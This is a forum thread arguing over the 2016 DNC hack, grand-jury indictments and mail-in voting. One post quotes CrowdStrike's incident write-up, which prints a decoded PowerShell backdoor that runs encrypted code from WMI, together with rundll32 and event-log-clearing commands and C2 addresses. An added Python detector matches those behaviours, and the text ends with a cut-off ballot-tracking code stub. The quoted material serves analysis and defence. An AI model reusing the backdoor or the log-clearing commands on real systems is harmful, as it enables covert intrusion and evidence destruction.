DKW 86

Hidden Over 2 Years: Dem Cyber-Firm's Sworn Testimony It Had No Proof of Russian Hack of DNC


14 minutes ago, I_M4_AU said:

Ole Tom can’t be serious.  “If the media chases every one of these as bombshell, they’re going to end up being a functioning arm of the Trump campaign“.  Do you really believe the media (other than FOX) will actually investigate these bombshells in an unbiased manner?

Trump didn't have to campaign very hard in 2016. Hillary crushed him in ad spending and the like. CNN, NYT, etc. gave him all the airtime he would ever need, and elevated Hillary's supposed crimes in such a way that a lot of people that usually vote D stayed home. That, along with the Trump campaign's excellent decision to target the supposedly solid blue rust belt,  won him the presidency. 

Scariest thing is that the media doesn't seem to have learned the lesson. 

Edited by AUDub
  • Like 1





They'll chase everything the Trump campaign drops out like a cat chasing a laser pointer, lending legitimacy to stuff that is quite obviously bull****.

And why is that?

Ratings and clicks, my dear boy, which is all they care about. 

Edited by AUDub
  • Like 2

6 minutes ago, AUDub said:

They'll chase everything the Trump campaign drops out like a cat chasing a laser pointer, lending legitimacy to stuff that is quite obviously bull****.

And why is that?

Ratings and clicks, my dear boy, which is all they care about. 

Get those ratings....besides it isn't the media's job to report accurately anyways. Or so I have been told on here.......lol

3 minutes ago, wdefromtx said:

Get those ratings....besides it isn't the media's job to report accurately anyways. Or so I have been told on here.......lol

I think, with some exceptions, rank and file reporters are decent folks that want to do right by their readership.

The people higher up the chain on the other hand, people like Haberman at the NYT or Zucker at CNN, are universally idiots.

  • Like 1

12 hours ago, AUDub said:

It's a "formal accusation of a serious crime," and an extremely compelling one, given that Mueller laid out his case extremely effectively therein. Not that I expected anything less than a handwave from you.

No, it's not. It is an okay to pursue more information or let the situation drop. 
You know: "You can indict a ham sandwich."
Ham sandwiches can't even perform serious crimes...😉


"Just" an indictment. LOL. What utter claptrap 

An indictment and $6 gets you a Venti Caramel Frappuccino @ Starbucks...

You are keeping me entertained today tho...

Edited by DKW 86

1 minute ago, DKW 86 said:

An indictment and $6 gets you a Venti Caramel Frappuccino @ Starbucks...

I prefer the Strawberry Açaí Refresher personally. lol 

  • Haha 1

4 minutes ago, DKW 86 said:

No, it's not. It is an okay to pursue more information or let the situation drop. 
You know: "You can indict a ham sandwich."
Ham sandwiches can't even perform serious crimes...😉

That is the dictionary definition of the word indictment. So the argument you're going with is to simply ignore it? Noted. 

  • Like 1

15 hours ago, AUDub said:

Like hell it is. 

I literally linked the indictment for you. Read it. Absorb it. This should all become clear at that point.

Read the Mueller report too. In fact, do a word search for Crowdstrike through the PDF. You'll find two mentions. In the footnotes. 

Crowdstrike is a red herring. 

You're speaking out of your depth. You have no idea how IT forensic investigations work, otherwise you'd know why this line of argument is bull****. I've performed forensic investigations on many pieces of networked medical equipment in my capacity as a clinical engineer.

Hell, the FBI contracts a ton of work to entities like Crowdstrike, including, get this, Crowdstrike, with regularity. Investigating a hack isn’t like investigating a murder. The Russians didn’t leave DNA evidence on the server racks and fingerprints on the keyboards. All the evidence of their comings and goings was on the computer hard drives, in memory, and in the ephemeral network transmissions to and from other locations.

The FBI made an unusual request, likely because they wanted access while the Russians were still there. They got their images, all the same data that Crowdstrike had access to, eventually. Their findings, in addition to others with additional evidence, confirmed the fact that the GRU is involved.

For the love of God, read the indictment I linked.

Read the foreword the Nation put on top of that article. VIPS' take is quite controversial (controversial is me being charitable, as they're flat wrong), and the Nation even ran it by a cybersecurity expert that said VIPS' conclusion was erroneous.

Hosting and management are two separate things. Even that slate article gets it wrong. The email server is not a single monolithic machine or set of machines in DNC offices. It's spread out among 140 AWS servers connected by a fiber backbone. This is a hard fact.

For the love of God, read the damned indictment I linked.

https://t.co/CofJpydBuQ?amp=1

Pages 6-13 lay it out easily enough for a layman, and page 11 details the dates and the location of the GRU leased server. 

What the hell do you think the internet is? A series of tubes?

It's hard to argue with you when you don't even have a fundamental understanding of what you're arguing. 

Look moron...I do IT for a living, at the Fortune 50 Level. I understand totally that you are trying to redefine words etc. The FBI has tools and people that do forensics in IT. They do it all the time. Why was no criminal investigative org given 100% full access to the hardware? Just answer that one. 

Crowdstrike says it has no evidence of anything. I think YOU are the one having problems reading. I assure you, I am not. 

And just so we are crystal clear, what some software/used car/furniture/penny pincher ad salesman says could not interest me in the least.

  • Facepalm 1

6 minutes ago, AUDub said:

That is the dictionary definition of the word indictment. So the argument you're going with is to simply ignore it? Noted. 

No, I am telling you the truth and it doesn't fit with your little narrative and you can't handle it. 
An indictment can mean many things, it could mean we are on our way!..to not really enough there. 
It can literally take next to nothing to get an indictment.
The Process is so lopsided, the Defendant has no rights in the Indictment Process. They can't challenge anything said etc.
You can also use testimony that is completely inadmissible in court to get an Indictment. 

But you know all this, and that's why you googled up that crazy definition of an indictment. 

Edited by DKW 86


I’m not picking sides here, but all I know is to get an indictment all that is really needed is a friendly judge....

 

Things I’ve learned while stuck staying at home all the time....

 

#LawandOrderSVU

lol

1 hour ago, DKW 86 said:

Look moron...I do IT for a living, at the Fortune 50 Level

I know you work in IT! Hell, I hold multiple Healthcare IT certifications from your employer!

Part of why the fact you're getting so much of it wrong here is so flipping strange!

Quote

I understand totally that you are trying to redefine words etc.

Just because you don't know the definition of the word indictment doesn't mean I'm trying to redefine it. Mueller made his case, which I keep linking and begging you to read. If they ever step foot on American soil, they will likely be arrested.  These guys have been formally charged, though they will probably never be tried. 

Quote

The FBI has tools and people that do forensics in IT. They do it all the time. Why was no criminal investigative org given 100% full access to the hardware? Just answer that one. 

This is actually very common practice! 

https://www.theverge.com/2017/1/5rbb/14178806/fbi-dnc-hack-server-examined-forensics-russia

Quote

The answer might be more than you think. It’s common for the initial forensic analysis to be conducted by outside firms like CrowdStrike, and once that data has been copied, there’s often little need to copy it again. BuzzFeed described the FBI’s lack of interest in the DNC’s server as unusual, citing a number of response firms that preferred not to be named. But that’s not a unanimous opinion, and two experts contacted by The Verge disagreed that it was unusual.

“This is normal practice,” says Matt Tait, founder and CEO of Capital Alpha Security. “In cases like this, the onus for digital forensics is on the third-party contracted by the company that's calling in the incident response team, in this case CrowdStrike.”

 

Quote

Crowdstrike says it has no evidence of anything. I think YOU are the one having problems reading. I assure you, I am not. 

No they said they didn't see any evidence of exfiltration. They did find Fancy Bear and Cozy Bear had infiltrated the server.

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Quote

By Dmitri Alperovitch

There is rarely a dull day at CrowdStrike where we are not detecting or responding to a breach at a company somewhere around the globe. In all of these cases, we operate under strict confidentiality rules with our customers and cannot reveal publicly any information about these attacks. But on rare occasions, a customer decides to go public with information about their incident and give us permission to share our knowledge of the adversary tradecraft with the broader community and help protect even those who do not happen to be our customers. This story is about one of those cases.

CrowdStrike Services Inc., our Incident Response group, was called by the Democratic National Committee (DNC), the formal governing body for the US Democratic Party, to respond to a suspected breach. We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network – COZY BEAR and FANCY BEAR. We’ve had lots of experience with both of these actors attempting to target our customers in the past and know them well. In fact, our team considers them some of the best threat actors out of all the numerous nation-state, criminal and hacktivist/terrorist groups we encounter on a daily basis. Their tradecraft is superb, operational security second to none and the extensive usage of ‘living-off-the-land’ techniques enables them to easily bypass many security solutions they encounter. In particular, we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and ‘access management’ tradecraft – both groups were constantly going back into the environment to change out their implants, modify persistent methods, move to new Command & Control channels and perform other tasks to try to stay ahead of being detected. Both adversaries engage in extensive political and economic espionage for the benefit of the government of the Russian Federation and are believed to be closely linked to the Russian government’s powerful and highly capable intelligence services.

COZY BEAR (also referred to in some industry reports as CozyDuke or APT 29) is the adversary group that last year successfully infiltrated the unclassified networks of the White House, State Department, and US Joint Chiefs of Staff. In addition to the US government, they have targeted organizations across the Defense, Energy, Extractive, Financial, Insurance, Legal, Manufacturing, Media, Think Tanks, Pharmaceutical, Research and Technology industries, along with Universities. Victims have also been observed in Western Europe, Brazil, China, Japan, Mexico, New Zealand, South Korea, Turkey and Central Asian countries. COZY BEAR’s preferred intrusion method is a broadly targeted spearphish campaign that typically includes web links to a malicious dropper. Once executed on the machine, the code will deliver one of a number of sophisticated Remote Access Tools (RATs), including AdobeARM, ATI-Agent, and MiniDionis. On many occasions, both the dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual machine, using a debugger, or located within a sandbox. They have extensive checks for the various security software that is installed on the system and their specific configurations. When specific versions are discovered that may cause issues for the RAT, it promptly exits. These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is highly attuned to slight configuration issues that may result in their detection, and which would cause them to deploy a different tool instead. The implants are highly configurable via encrypted configuration files, which allow the adversary to customize various components, including C2 servers, the list of initial tasks to carry out, persistence mechanisms, encryption keys and others. An HTTP protocol with encrypted payload is used for the Command & Control communication.

FANCY BEAR (also known as Sofacy or APT 28) is a separate Russian-based threat actor, which has been active since the mid-2000s, and has been responsible for targeted intrusion campaigns against the Aerospace, Defense, Energy, Government and Media sectors. Their victims have been identified in the United States, Western Europe, Brazil, Canada, China, Georgia, Iran, Japan, Malaysia and South Korea. Extensive targeting of defense ministries and other military victims has been observed, the profile of which closely mirrors the strategic interests of the Russian government, and may indicate affiliation with Главное Разведывательное Управление (Main Intelligence Department) or GRU, Russia’s premier military intelligence service. This adversary has a wide range of implants at their disposal, which have been developed over the course of many years and include Sofacy, X-Agent, X-Tunnel, WinIDS, Foozer and DownRage droppers, and even malware for Linux, OSX, IOS, Android and Windows Phones. This group is known for its technique of registering domains that closely resemble domains of legitimate organizations they plan to target. Afterwards, they establish phishing sites on these domains that spoof the look and feel of the victim’s web-based email services in order to steal their credentials. FANCY BEAR has also been linked publicly to intrusions into the German Bundestag and France’s TV5 Monde TV station in April 2015.

At DNC, COZY BEAR intrusion has been identified going back to summer of 2015, while FANCY BEAR separately breached the network in April 2016. We have identified no collaboration between the two actors, or even an awareness of one by the other.  Instead, we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials. While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other’s operations, in Russia this is not an uncommon scenario. “Putin’s Hydra: Inside Russia’s Intelligence Services”, a recent paper from European Council on Foreign Relations, does an excellent job outlining the highly adversarial relationship between Russia’s main intelligence services – Федеральная Служба Безопасности (FSB), the primary domestic intelligence agency but one with also significant external collection and ‘active measures’  remit, Служба Внешней Разведки (SVR), the primary foreign intelligence agency, and the aforementioned GRU. Not only do they have overlapping areas of responsibility, but also rarely share intelligence and even occasionally steal sources from each other and compromise operations. Thus, it is not surprising to see them engage in intrusions against the same victim, even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations.

The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation (WMI) system, which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule. The Powershell backdoor is ingenious in its simplicity and power. It consists of a single obfuscated command set up to run persistently, such as:

powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand 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

 

This decodes to:

function perfCr($crTr, $data){
$ret = $null
try{
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cs.Write($data, 0, $data.Length)
$cs.FlushFinalBlock()
$ret = $ms.ToArray()
$cs.Close()
$ms.Close()
}
catch{}
return $ret
}
function decrAes($encData, $key, $iv)
{
$ret = $null
try{
$prov = New-Object System.Security.Cryptography.RijndaelManaged
$prov.Key = $key
$prov.IV = $iv
$decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
$ret = perfCr $decr $encData
}
Catch{}
return $ret
}
function sWP($cN, $pN, $aK, $aI)
{
if($cN -eq $null -or $pN -eq $null){return $false}
try{
$wp = ([wmiclass]$cN).Properties[$pN].Value
$exEn = [Convert]::FromBase64String($wp)
$exDec = decrAes $exEn $aK $aI
$ex = [Text.Encoding]::UTF8.GetString($exDec)
if($ex -eq $null -or $ex -eq '')
{return}
Invoke-Expression $ex
return $true
}
catch{
return $false
}
}
$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
sWP 'Wmi' 'Wmi' $aeK $aeI | Out-Null

This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.

FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as:

rundll32.exe "C:\Windows\twain_64.dll"

In addition, FANCY BEAR’s X-Tunnel network tunneling tool, which facilitates connections to NAT-ed environments, was used to also execute remote commands. Both tools were deployed via RemCOM, an open-source replacement for PsExec available from GitHub. They also engaged in a number of anti-forensic analysis measures, such as periodic event log clearing (via wevtutil cl System and wevtutil cl Security commands) and resetting timestamps of files.

Intelligence collection directed by nation state actors against US political targets provides invaluable insight into the requirements directed upon those actors. Regardless of the agency or unit tasked with this collection, the upcoming US election, and the associated candidates and parties are of critical interest to both hostile and friendly nation states. The 2016 presidential election has the world’s attention, and leaders of other states are anxiously watching and planning for possible outcomes. Attacks against electoral candidates and the parties they represent are likely to continue up until the election in November.

Indicators of Compromise:

IOC | Adversary | IOC Type | Additional Info
6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536 | COZY BEAR | SHA256 | pagemgr.exe (SeaDaddy implant)
b101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae | COZY BEAR | SHA256 | pagemgr.exe (SeaDaddy implant)
185[.]100[.]84[.]134:443 | COZY BEAR | C2 | SeaDaddy implant C2
58[.]49[.]58[.]58:443 | COZY BEAR | C2 | SeaDaddy implant C2
218[.]1[.]98[.]203:80 | COZY BEAR | C2 | Powershell implant C2
187[.]33[.]33[.]8:80 | COZY BEAR | C2 | Powershell implant C2
fd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5 | FANCY BEAR | SHA256 | twain_64.dll (64-bit X-Agent implant)
4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976 | FANCY BEAR | SHA256 | VmUpgradeHelper.exe (X-Tunnel implant)
40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f | FANCY BEAR | SHA256 | VmUpgradeHelper.exe (X-Tunnel implant)
185[.]86[.]148[.]227:443 | FANCY BEAR | C2 | X-Agent implant C2
45[.]32[.]129[.]185:443 | FANCY BEAR | C2 | X-Tunnel implant C2
23[.]227[.]196[.]217:443 | FANCY BEAR | C2 | X-Tunnel implant C2

Hell, the FBI knew Cozy Bear was there before the DNC did, and 7 months before Crowdstrike was contracted. Pages 26 and 27.

https://www.google.com/url?sa=t&source=web&rct=j&url=https://intelligence.house.gov/uploadedfiles/ty54.pdf&ved=2ahUKEwjSnojlh7TpAhWuneAKHZNFCREQFnoECAQQAA&usg=AOvVaw0qejyJ6AgIsCddRqwjT-Zm

But the evidence is more broad than that! Read the indictment!

Edited by AUDub

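The tradecraft in the quoted CrowdStrike post (an encoded PowerShell command launched from WMI, rundll32 loading twain_64.dll, wevtutil clearing the event logs, and the published IOC list) is the kind of material a defender turns into detection logic. The Python below is an added example written for this thread; it is not CrowdStrike's code or tooling and was not posted by anyone in the discussion. The key=value telemetry format, the host names and the sample log lines are constructed for the example (the EncodedCommand blob is a constructed UTF-16LE encoding of the word "function"); the hashes and C2 endpoints are copied from the IOC table in the quoted post.

```python
import base64
import re

# Indicators of compromise copied from the quoted CrowdStrike post (defanged "[.]" form kept as published).
IOC_HASHES = {
    "6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536": "COZY BEAR pagemgr.exe (SeaDaddy implant)",
    "b101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae": "COZY BEAR pagemgr.exe (SeaDaddy implant)",
    "fd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5": "FANCY BEAR twain_64.dll (64-bit X-Agent implant)",
    "4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976": "FANCY BEAR VmUpgradeHelper.exe (X-Tunnel implant)",
    "40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f": "FANCY BEAR VmUpgradeHelper.exe (X-Tunnel implant)",
}
IOC_C2 = {
    "185[.]100[.]84[.]134:443": "COZY BEAR SeaDaddy implant C2",
    "58[.]49[.]58[.]58:443": "COZY BEAR SeaDaddy implant C2",
    "218[.]1[.]98[.]203:80": "COZY BEAR Powershell implant C2",
    "187[.]33[.]33[.]8:80": "COZY BEAR Powershell implant C2",
    "185[.]86[.]148[.]227:443": "FANCY BEAR X-Agent implant C2",
    "45[.]32[.]129[.]185:443": "FANCY BEAR X-Tunnel implant C2",
    "23[.]227[.]196[.]217:443": "FANCY BEAR X-Tunnel implant C2",
}


def refang(indicator):
    """Turn the published 'a[.]b[.]c[.]d:port' form back into a matchable 'a.b.c.d:port'."""
    return indicator.replace("[.]", ".")


C2_BY_ENDPOINT = {refang(k): v for k, v in IOC_C2.items()}

# Behavioural rules for the tradecraft the post describes, matched against the process command line.
ENCODED_CMD = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
BEHAVIOUR_RULES = [
    ("encoded_powershell", re.compile(r"powershell(?:\.exe)?\b.*?\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]+", re.I)),
    ("execution_policy_bypass", re.compile(r"\s-executionpolicy\s+bypass\b", re.I)),
    ("event_log_cleared", re.compile(r"wevtutil(?:\.exe)?\s+cl\s+\S+", re.I)),
    ("rundll32_twain_64", re.compile(r"rundll32(?:\.exe)?\s+\"?[^\"]*twain_64\.dll", re.I)),
]

# Constructed key=value telemetry format (hypothetical, not a real EDR schema); quoted values may contain \" escapes.
FIELD = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line):
    """Parse one log line into a dict, unquoting and unescaping quoted values."""
    out = {}
    for key, val in FIELD.findall(line):
        if val.startswith('"'):
            val = val[1:-1].replace('\\"', '"')
        out[key] = val
    return out


def decoded_command(cmdline):
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(line):
    """Findings for one line: behaviour rule names first, then IOC hash and C2 matches."""
    ev = parse_event(line)
    findings = [name for name, rx in BEHAVIOUR_RULES if rx.search(ev.get("cmdline", ""))]
    sha = ev.get("sha256", "").lower()
    if sha in IOC_HASHES:
        findings.append("ioc_hash:" + IOC_HASHES[sha])
    if ev.get("dest") in C2_BY_ENDPOINT:
        findings.append("ioc_c2:" + C2_BY_ENDPOINT[ev["dest"]])
    return findings


def scan(lines):
    """Group findings by host; lines with nothing to report are dropped."""
    report = {}
    for line in lines:
        hits = analyze_event(line)
        if hits:
            ev = parse_event(line)
            report.setdefault(ev.get("host", "?"), []).append((ev.get("event"), hits))
    return report


# Constructed sample telemetry (not real DNC data): one benign line and four that match the post's tradecraft.
SAMPLE_LOGS = [
    r'host=ws01 event=process_create image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt" sha256=0000000000000000000000000000000000000000000000000000000000000000',
    r'host=ws01 event=process_create image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuAA==" parent=WmiPrvSE.exe',
    r'host=ws02 event=process_create image=C:\Windows\System32\rundll32.exe cmdline="rundll32.exe \"C:\Windows\twain_64.dll\"" sha256=FD39D2837B30E7233BC54598FF51BDC2F8C418FA5B94DEA2CADB24CF40F395E5',
    r'host=ws02 event=process_create image=C:\Windows\System32\wevtutil.exe cmdline="wevtutil cl Security"',
    r'host=ws02 event=net_connect image=C:\Windows\VmUpgradeHelper.exe dest=45.32.129.185:443',
]

if __name__ == "__main__":
    for host, events in scan(SAMPLE_LOGS).items():
        for event, hits in events:
            print(host, event, ", ".join(hits))
```

Running the file prints one report line per flagged event. The hash and endpoint matches are exact-match lookups, so on their own they only catch the samples and servers the post listed; the behaviour rules are what would still fire against the rotated implants, per-system keys and new C2 channels the post says both actors used, which is why a detection built from this kind of write-up should carry both.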
2 hours ago, DKW 86 said:

No, I am telling you the truth and it doesn't fit with your little narrative and you can't handle it. 

No, you are not. You're attempting to handwave away a compelling piece of evidence.

Quote


An indictment can mean many things, it could mean we are on our way!..to not really enough there. 

No it means they have been criminally charged. Not much else to do besides try them in the court of law. 

Quote

It can literally take next to nothing to get an indictment.

It can! But I'm not asking you to weigh the evidence contained therein because it's an indictment! 

Quote

The Process is so lopsided, the Defendant has no rights in the Indictment Process. They can't challenge anything said etc.
You can also use testimony that is completely inadmissible in court to get an Indictment. 

That's because an indictment is returned when the state makes its case before the grand jury. Defendants don't get a say.

But that's why they get a trial.

But, again, I'm not asking you to weigh the evidence contained therein because it's an indictment! 

Quote

But you know all this, and that's why you googled up that crazy definition of an indictment. 

It's not a crazy definition at all. That's literally what an indictment is in Common Law!

Edited by AUDub
  • Like 1

3 hours ago, AUDub said:

Trump didn't have to campaign very hard in 2016. Hillary crushed him in ad spending and the like. CNN, NYT, etc. gave him all the airtime he would ever need, and elevated Hillary's supposed crimes in such a way that a lot of people that usually vote D stayed home. That, along with the Trump campaign's excellent decision to target the supposedly solid blue rust belt,  won him the presidency. 

Scariest thing is that the media doesn't seem to have learned the lesson. 

I think this time around even though Trump will blast the news about Biden involved in the Russia Hoax and the media will have to pay some attention to it, I think the media will hit the Coronavirus response and recovery (or 2nd wave as the case may be) hard without let up.  The public may get tired of that by October, but I’m sure Biden’s campaign will keep it in the news.

If this House bill gets anything close to what they ask for, there will be millions of new voters (new citizens that were illegal aliens) that just got free money from Nancy.  That coupled with the mail-in ballots, how could Biden lose?

  • Haha 1
  • Facepalm 1

16 minutes ago, I_M4_AU said:

I think this time around even though Trump will blast the news about Biden involved in the Russia Hoax and the media will have to pay some attention to it, I think the media will hit the Coronavirus response and recovery (or 2nd wave as the case may be) hard without let up.  The public may get tired of that by October, but I’m sure Biden’s campaign will keep it in the news.

If this House bill gets anything close to what they ask for, there will be millions of new voters (new citizens that were illegal aliens) that just got free money from Nancy.  That coupled with the mail-in ballots, how could Biden lose?

I haven't looked yet all the way, but did they try to wrap in mail voting? Ugh. 

 

Their bill is DOA in the Senate anyways. 

  • Facepalm 1

18 minutes ago, wdefromtx said:

I haven't looked yet all the way, but did they try to wrap in mail voting? Ugh. 

 

Their bill is DOA in the Senate anyways. 

The funding is meant to assist states in addressing new challenges posed by holding elections during the COVID-19 pandemic, such as expanding mail-in and early in-person voting.

https://thehill.com/policy/cybersecurity/497375-house-democrats-include-36-billion-for-mail-in-voting-in-new-stimulus

You’re right, Mitch will shut this down.

1 minute ago, I_M4_AU said:

The funding is meant to assist states in addressing new challenges posed by holding elections during the COVID-19 pandemic, such as expanding mail-in and early in-person voting.

https://thehill.com/policy/cybersecurity/497375-house-democrats-include-36-billion-for-mail-in-voting-in-new-stimulus

You’re right, Mitch will shut this down.

My solution is and has been a system where you can request a ballot to be sent to you and then you can bring it to the polls in a contactless or drive through drop off type  of situation. That way it helps protect against the virus and you still get physical presence for voting. 

  • Facepalm 1

1 minute ago, wdefromtx said:

My solution is and has been a system where you can request a ballot to be sent to you and then you can bring it to the polls in a contactless or drive through drop off type  of situation. That way it helps protect against the virus and you still get physical presence for voting. 

That would work for the most vulnerable, say 60+, otherwise social distance and wear a mask.  Just too much room for nefarious activity.

  • Facepalm 1

2 minutes ago, I_M4_AU said:

That would work for the most vulnerable, say 60+, otherwise social distance and wear a mask.  Just too much room for nefarious activity.

Exactly. Also, remember the USPS doesn't exactly have a stellar rating on getting mail to their destination sometimes. LOL

  • Like 1
  • Facepalm 1

3 hours ago, AUDub said:

I know you work in IT! Hell, I hold multiple Healthcare IT certifications from your employer!

Part of why the fact you're getting so much of it wrong here is so flipping strange!

Just because you don't know the definition of the word indictment doesn't mean I'm trying to redefine it. Mueller made his case, which I keep linking and begging you to read. If they ever step foot on American soil, they will likely be arrested.  These guys have been formally charged, though they will probably never be tried. 

This is actually very common practice! 

https://www.theverge.com/2017/1/5rbb/14178806/fbi-dnc-hack-server-examined-forensics-russia

 

No they said they didn't see any evidence of exfiltration. They did find Fancy Bear and Cozy Bear had infiltrated the server.

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Hell, the FBI knew Cozy Bear was there before the DNC did, and 7 months before Crowdstrike was contracted. Pages 26 and 27.

https://www.google.com/url?sa=t&source=web&rct=j&url=https://intelligence.house.gov/uploadedfiles/ty54.pdf&ved=2ahUKEwjSnojlh7TpAhWuneAKHZNFCREQFnoECAQQAA&usg=AOvVaw0qejyJ6AgIsCddRqwjT-Zm

But the evidence is more broad than that! Read the indictment!

Actually, you are right about this.
The FBI went to the Sierra Foxtrots at the DNC and told them, some as many as 6X, that there was malware on the server. 
The DNC did ZERO. Took no action at all. Not even PW resets.
I have no sympathy for people that are warned repeatedly and still do nothing and then want to have a whine and cheese party when what they were warned about blows up in their faces. But this is true. THE DNC WAS WARNED REPEATEDLY BY THE FBI BEFORE THE HACK BECAME FRONTPAGE NEWS. THEY DID ABSOLUTELY NOTHING. ZERO. COMPLETELY IGNORED THE FBI.

When you are this pathetic and you get blown up, well, it sucks to be you. 

https://www.thedailybeast.com/cheats/2016/12/13/dnc-blew-off-fbi-hack-warnings

https://www.cnn.com/2016/07/25/politics/democratic-convention-dnc-emails-russia/index.html

https://themoscowproject.org/collusion/fbi-informs-dnc-russian-hacking/

https://thehill.com/policy/national-security/313555-comey-fbi-did-request-access-to-hacked-dnc-servers

*** Going back to 2015, The FBI was telling the DNC they were being hacked. And they did nothing.

 

Edited by DKW 86

2 hours ago, AUDub said:

No, you are not. You're attempting to handwave away a compelling piece of evidence.

An indictment is not a compelling piece of evidence. It is a request for charges to be brought. It is COMPLETELY unchallenged.
No rules of evidence apply, none.
No rules of testifying. You can't even use some testimony used to get an indictment in the trial. I 
No challenging any one about anything. 
No presence of the Defense there whatsoever. 
No Cross-examination.  

No it means they have been criminally charged. Not much else to do besides try them in the court of law. 

COMPLETELY WRONG. Often, half or more of a case is built AFTER the Indictment. 
Do you realize that some or possibly even most evidence used in an Indictment might not be usable in a court of law???

It can! But I'm not asking you to weigh the evidence contained therein because it's an indictment! 
That's because an indictment is returned when the state makes its case before the grand jury. Defendants don't get a say.

But that's why they get a trial.

But, again, I'm not asking you to weigh the evidence contained therein because it's an indictment! 

It's not a crazy definition at all. That's literally what an indictment is in Common Law!

 

Quote

 

https://www.justice.gov/usao/justice-101/charging

Definition from the DOJ.

For potential felony charges, a prosecutor will present the evidence to an impartial group of citizens called a grand jury. Witnesses may be called to testify, evidence is shown to the grand jury, and an outline of the case is presented to the grand jury members. The grand jury listens to the prosecutor and witnesses, and then votes in secret on whether they believe that enough evidence exists to charge the person with a crime. A grand jury may decide not to charge an individual based upon the evidence, no indictment would come from the grand jury. All proceedings and statements made before a grand jury are sealed, meaning that only the people in the room have knowledge about who said what about whom. The grand jury is a constitutional requirement for certain types of crimes (meaning it is written in the United States Constitution) so that a group of citizens who do not know the defendant can make an unbiased decision about the evidence before voting to charge an individual with a crime.

Grand juries are made up of approximately 16-23 members. Their proceedings can only be attended by specific persons. For example, witnesses who are compelled to testify before the grand jury are not allowed to have an attorney present. At least twelve jurors must concur in order to issue an indictment.

Unsealing GJ Testimony is illegal. The witnesses get a lawyer, the defendant gets a lawyer, everything changes. An indictment might not mean anything.

Edited by DKW 86

40 minutes ago, I_M4_AU said:

That would work for the most vulnerable, say 60+, otherwise social distance and wear a mask.  Just too much room for nefarious activity.

There's really not though.  Each ballot gets mailed with a bar code coinciding with the voter's information.  Once that bar code is scanned into the system after being dropped off at a secure location, you're good.  Hard to fraudulently vote that way.

The state of Washington already uses a similar system as the one described.  No concerns or evidence of widespread voter fraud at all so far up there.  Opinion article, but the pertinent info is this:

"Washington's Republican Secretary of State released figures Monday on the 2018 election. Just 142 cases of improper voting out of 3.1 million ballots were referred to county sheriffs and prosecutors for legal action.

That's 0.004% of what was an energized electorate"

https://www.seattlepi.com/local/politics/article/wash-vote-by-mail-2018-improper-voting-released-15245906.php

Edited by Brad_ATX
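The post above describes a return-tracking check: each mailed ballot carries a barcode tied to the voter, and a ballot counts only once its barcode has been scanned in at a secure drop site. The following is an added example, not code from any election office and not a description of how Washington actually implements its system. It models the check as (1) an issuance ledger, (2) a barcode whose trailing tag is an HMAC over the election and voter identifiers so that a barcode cannot simply be typed up, and (3) a scan step that rejects malformed, forged, never-issued and duplicate returns. The key, the barcode layout, the voter identifiers and the rejection codes are all assumptions constructed for the example; the `unaccounted()` helper shows what "issued but never returned" means in such a ledger.

```python
"""
Illustrative model of a barcode-tracked mail ballot return check.
Added example; NOT the real system of any state. Key, barcode layout,
voter IDs and result codes are constructed for the demo.
"""
import hashlib
import hmac

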